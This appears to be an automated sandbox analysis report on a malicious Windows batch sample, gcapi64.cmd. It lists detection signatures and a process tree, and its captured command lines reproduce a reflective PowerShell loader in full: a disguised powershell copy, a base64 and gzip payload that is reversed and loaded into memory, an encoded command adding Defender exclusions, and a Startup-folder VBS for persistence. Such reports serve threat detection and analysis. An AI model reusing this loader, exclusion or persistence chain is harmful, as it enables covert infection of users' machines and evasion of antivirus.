Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gcapi64.cmd

Overview

General Information

Sample name:gcapi64.cmd
Analysis ID:1497306
MD5:ad4de6cf42956fe04c16a4c5377eda7a
SHA1:b5a13111caad3291efe38a0752d8b289c474554c
SHA256:750dd9d265a0d47dd35f13d2f9eada3e4d645333cc5dd5f7e88cfb402d2d6d53
Tags:91-92-240-9cmd
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
.NET source code contains potential unpacker
AI detected suspicious sample
Creates a thread in another existing process (thread injection)
Drops VBS files to the startup folder
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • xcopy.exe (PID: 7504 cmdline: xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.Kwj MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
    • attrib.exe (PID: 7528 cmdline: attrib +s +h C:\Users\user\Desktop\gcapi64.cmd.Kwj MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • gcapi64.cmd.Kwj (PID: 7544 cmdline: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7928 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • InstallUtil.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 1852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5216 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\gcapi64.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1004 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xcopy.exe (PID: 7340 cmdline: xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • attrib.exe (PID: 1516 cmdline: attrib +s +h C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • gcapi64.cmd.Kwj (PID: 2640 cmdline: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\AppData\Roaming\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • InstallUtil.exe (PID: 2004 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
          • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.2426048985.000001C9C5C4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x149010:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0x14c546:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000005.00000002.2079460129.000002583DC00000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000015.00000002.2524944818.000001C9DE4F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          21.2.InstallUtil.exe.1c9d5d7c5d8.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            21.2.InstallUtil.exe.1c9c5c75118.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              10.2.InstallUtil.exe.16b9915aa98.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                10.2.InstallUtil.exe.16b99182ad0.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  10.2.InstallUtil.exe.16b9915aa98.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 11 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\gcapi64.cmd.Kwj, NewProcessName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, OriginalFileName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ProcessId: 7544, ProcessName: gcapi64.cmd.Kwj
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\gcapi64.cmd.Kwj, NewProcessName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, OriginalFileName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ProcessId: 7544, ProcessName: gcapi64.cmd.Kwj
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ParentImage: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentProcessId: 7544, ParentProcessName: gcapi64.cmd.Kwj, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZ
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" , ProcessId: 1852, ProcessName: wscript.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\gcapi64.cmd.Kwj, NewProcessName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, OriginalFileName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ProcessId: 7544, ProcessName: gcapi64.cmd.Kwj
                    Sigma detected: Gzip Archive Decode Via PowerShell
                    Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\gcapi64.cmd.Kwj, NewProcessName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, OriginalFileName: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentCommandLine: C:\Windows\system32\cmd.exe /c 